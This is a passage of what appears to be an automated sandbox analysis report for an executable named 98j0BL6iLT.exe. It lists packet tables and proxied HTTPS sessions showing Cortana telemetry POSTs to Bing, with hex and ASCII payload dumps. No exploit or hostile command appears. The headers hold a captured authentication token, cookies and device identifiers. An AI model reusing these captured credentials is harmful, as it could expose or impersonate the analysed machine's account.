                                    Jan 25, 2023 19:45:12.275682926 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.344402075 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.346509933 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.347239017 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.347258091 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348205090 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.348223925 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348278999 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.348298073 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348474979 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.348501921 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.348757982 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.349118948 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.349219084 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.349237919 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.521493912 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.521614075 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.521641970 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.521713972 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.521739006 CET44349685204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:45:12.522600889 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:12.522600889 CET49685443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:45:58.100601912 CET804967893.184.221.240192.168.2.3
                                    Jan 25, 2023 19:45:58.100739956 CET4967880192.168.2.393.184.221.240
                                    Jan 25, 2023 19:45:58.270828962 CET4967980192.168.2.393.184.221.240
                                    Jan 25, 2023 19:45:58.270889044 CET4968080192.168.2.3173.222.108.210
                                    Jan 25, 2023 19:45:58.284547091 CET8049680173.222.108.210192.168.2.3
                                    Jan 25, 2023 19:45:58.288470030 CET4968080192.168.2.3173.222.108.210
                                    Jan 25, 2023 19:45:58.291554928 CET804967993.184.221.240192.168.2.3
                                    Jan 25, 2023 19:45:58.308500051 CET4967980192.168.2.393.184.221.240
                                    Jan 25, 2023 19:46:25.131387949 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.131450891 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.131552935 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.131990910 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.132011890 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.224256039 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.224395990 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.224802017 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.224828005 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.225864887 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.225883007 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.225972891 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.225995064 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226012945 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.226028919 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226218939 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.226355076 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226758003 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.226934910 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.227015018 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.413876057 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.414073944 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.414256096 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:25.414319992 CET44349686204.79.197.200192.168.2.3
                                    Jan 25, 2023 19:46:25.414392948 CET49686443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:46.874506950 CET49673443192.168.2.3204.79.197.200
                                    Jan 25, 2023 19:46:59.524652958 CET804967893.184.221.240192.168.2.3
                                    Jan 25, 2023 19:46:59.524837017 CET4967880192.168.2.393.184.221.240

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 25, 2023 19:45:18.062972069 CET51300274192.168.2.3192.168.2.1
                                    Jan 25, 2023 19:46:24.221510887 CET138138192.168.2.3192.168.2.255

                                    ICMP Packets

                                    TimestampSource IPDest IPChecksumCodeType
                                    Jan 25, 2023 19:45:17.621686935 CET192.168.2.3192.168.2.1f7fcEcho
                                    Jan 25, 2023 19:45:17.621732950 CET192.168.2.1192.168.2.3fffcEcho Reply
                                    Jan 25, 2023 19:45:18.063033104 CET192.168.2.1192.168.2.38308(Port unreachable)Destination Unreachable

                                    HTTP Request Dependency Graph

                                    • https:
                                      • www.bing.com
                                    • fs.microsoft.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349677204.79.197.200443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:44:58 UTC0OUTPOST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 87284
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    2023-01-25 18:44:58 UTC2OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 62 38 39 65 62 65 32 38 63 66 65 39 34 31 35 66 38 61 64 65 33 38 62 63 66 66 64 35 32 65 38 61 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>b89ebe28cfe9415f8ade38bcffd52e8a</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    2023-01-25 18:44:58 UTC18OUTData Raw: 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47 3e 37 33 38 35 64 65 38 36 32 35 66 62 34 33 31 30 62 37 30 35 39 37 30 62 32 38 64 35 35 38 62 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 65 72 72 6f 72 54 79 70 65 22 3a 22
                                    Data Ascii: TS></E><E><T>Event.CIQueueError</T><IG>7385de8625fb4310b705970b28d558b3</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"
                                    2023-01-25 18:44:58 UTC34OUTData Raw: 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 73 2f 72 2f 2f 40 30 2f 6d 61 6e 69 66 65 73 74 25 32 46 74 68 72 65 73 68 6f 6c 64 2e 61 70 70 63 61 63 68 65 2f 6f 74 68 65 72 2f 30 2f 40 31 2f 63 73 2f 2d 31 2f 63 73 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 7a 2f 73 2f 2f 40 30 2f 46 72 61 6d 65 77 6f 72 6b 2f 40 33 2f 30 2f 40 31 2f 63 7a 2f 2d 31 2f 63 7a 2f 64 30 2f 64 30 2f 64 30 2b 65 31 2f 74 2f 2f 40 30 2f 74 68 72 65 73 68 6f 6c 64 25 32 46 78 6c 73 2e 61 73 70 78 2f 78 6d 6c 68 74 74 70 72 65 71 75 65 73 74 2f 30 2f 40 31 2f 65 31 2f 2d 31 2f 65 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 53 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 76 2f 2f 40 30
                                    Data Ascii: @1/-1/-1/-1/-1/-1/-1+cs/r//@0/manifest%2Fthreshold.appcache/other/0/@1/cs/-1/cs/-1/-1/-1+cz/s//@0/Framework/@3/0/@1/cz/-1/cz/d0/d0/d0+e1/t//@0/threshold%2Fxls.aspx/xmlhttprequest/0/@1/e1/-1/e1/-1/-1/-1+et/u//@0/V2%2F2,SWVS//0/@1/-1/-1/-1/-1/-1/-1+et/v//@0
                                    2023-01-25 18:44:58 UTC50OUTData Raw: 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 41 43 56 65 72 22 3a 22 34 65 66 36 36 31 66 32 22 2c 22 46 44 50 61 72 74 6e 65 72 45 6e 74 72 79 22 3a 22 61 75 74 6f 73 75 67 67 65 73 74 22 2c 22 69 73 4f 66 66 6c 69 6e 65 22 3a 30 2c 22 77 65 62 52 65 71 75 65 73 74 65 64 22 3a 31 2c 22 65 6e 74 72 79 50 6f 69 6e 74 22 3a 22 57 4e 53 53 54
                                    Data Ascii: it","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSST
                                    2023-01-25 18:44:58 UTC66OUTData Raw: 76 72 3e 3c 2f 4d 3e 3c 2f 47 72 6f 75 70 3e 3c 47 72 6f 75 70 3e 3c 4d 3e 3c 49 47 3e 65 62 33 65 30 38 30 39 32 37 62 63 34 36 65 32 39 37 32 36 34 31 34 34 37 34 35 36 30 35 61 64 3c 2f 49 47 3e 3c 44 53 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 44 2e 41 67 67 72 65 67 61 74 6f 72 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 41 67 67 72 65 67 61 74 6f 72 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 44 53 22 3a 5b 5d 2c 22 72 61 6e 6b 65 72 4d 6f 64 65 6c 49 64 73 22 3a 7b 22 66 61 73 74 52 61 6e 6b 4d 6f 64 65 6c 49 64 22 3a 22 53 54 48 5f 38 64 30 36 66 38 33 63 2d 64 61 35 38 2d 34 63 30 32 2d 38 66 65 38 2d 62 61 32 63 30 34 39 64 39 38 30 39
                                    Data Ascii: vr></M></Group><Group><M><IG>eb3e080927bc46e297264144745605ad</IG><DS><![CDATA[[{"T":"D.Aggregator","Service":"AutoSuggest","Scenario":"Aggregator","AppNS":"SmartSearch","DS":[],"rankerModelIds":{"fastRankModelId":"STH_8d06f83c-da58-4c02-8fe8-ba2c049d9809
                                    2023-01-25 18:44:58 UTC82OUTData Raw: 63 70 3d 37 26 63 76 69 64 3d 33 31 32 33 65 66 35 63 30 38 35 65 34 65 37 33 39 31 30 63 36 38 33 32 36 30 31 32 38 31 38 32 26 69 67 3d 36 34 38 62 65 35 66 33 32 32 64 31 34 35 37 34 38 36 61 30 35 38 39 62 37 36 30 63 61 37 38 36 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 35 39 35 35 32 34 36 38 33 33 38 35 2c 22 55 54 53 22 3a 31 36 37 34 37 30 34 36 39 36 31 36 37 2c 22 55 78 43 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 22 3a 7b 22 63 6c 69 65 6e 74 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 4d 55 49 44 22 3a
                                    Data Ascii: cp=7&cvid=3123ef5c085e4e73910c683260128182&ig=648be5f322d1457486a0589b760ca786&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1595524683385,"UTS":1674704696167,"UxClassification":{"client":"windows"},"Cookies":{"MUID":
                                    2023-01-25 18:44:58 UTC87INHTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: BD055465204E4FDAA19CDA288C73D677 Ref B: FRA31EDGE0505 Ref C: 2023-01-25T18:44:58Z
                                    Date: Wed, 25 Jan 2023 18:44:57 GMT
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.349681204.79.197.200443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:45:01 UTC88OUTPOST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 89890
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    2023-01-25 18:45:01 UTC90OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    2023-01-25 18:45:01 UTC106OUTData Raw: 3a 38 2c 22 50 4c 22 3a 31 2c 22 4b 22 3a 32 31 2c 22 52 52 54 22 3a 7b 22 43 47 22 3a 32 36 2c 22 4d 52 55 22 3a 32 37 2c 22 4d 50 50 22 3a 32 37 2c 22 4d 53 54 22 3a 32 37 2c 22 4d 46 46 22 3a 32 37 2c 22 49 46 46 22 3a 33 37 2c 22 50 50 22 3a 34 36 2c 22 57 65 62 22 3a 37 31 7d 2c 22 52 46 54 22 3a 7b 22 50 50 22 3a 37 31 2c 22 4d 50 50 22 3a 37 31 2c 22 4d 53 54 22 3a 37 31 2c 22 43 47 22 3a 37 31 7d 2c 22 54 52 52 22 3a 5b 7b 22 56 22 3a 36 39 2c 22 54 22 3a 22 50 50 22 7d 5d 2c 22 49 52 54 22 3a 7b 22 31 30 30 31 2e 31 54 22 3a 7b 22 42 22 3a 34 39 2c 22 45 22 3a 36 38 2c 22 54 22 3a 22 50 50 22 7d 2c 22 31 30 30 32 2e 31 53 22 3a 7b 22 42 22 3a 35 34 2c 22 45 22 3a 36 39 2c 22 54 22 3a 22 50 50 22 7d 7d 7d 5d 2c 22 53 54 41 54 45 22 3a 7b 22 57 65
                                    Data Ascii: :8,"PL":1,"K":21,"RRT":{"CG":26,"MRU":27,"MPP":27,"MST":27,"MFF":27,"IFF":37,"PP":46,"Web":71},"RFT":{"PP":71,"MPP":71,"MST":71,"CG":71},"TRR":[{"V":69,"T":"PP"}],"IRT":{"1001.1T":{"B":49,"E":68,"T":"PP"},"1002.1S":{"B":54,"E":69,"T":"PP"}}}],"STATE":{"We
                                    2023-01-25 18:45:01 UTC122OUTData Raw: 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 6a 6d 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 43 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 22 2c 22 54 53 22 3a 31 36 33 32 33 35 39 32 30 34 31 30 31 2c 22 52 54 53 22 3a 31 35 32 33 2c 22 53 45 51 22 3a 31 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 55 54 53 22 3a 31 36 37 34 37 30 34 37 30 31 31 38 32 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 32 30 34 31 30 31 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47
                                    Data Ascii: /-1/-1/-1/-1+jm/u//@0/V2%2F2,SWVC//0/@1/-1/-1/-1/-1/-1/-1","TS":1632359204101,"RTS":1523,"SEQ":1,"CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1674704701182}...</D><TS>1632359204101</TS></E><E><T>Event.CIQueueError</T><IG
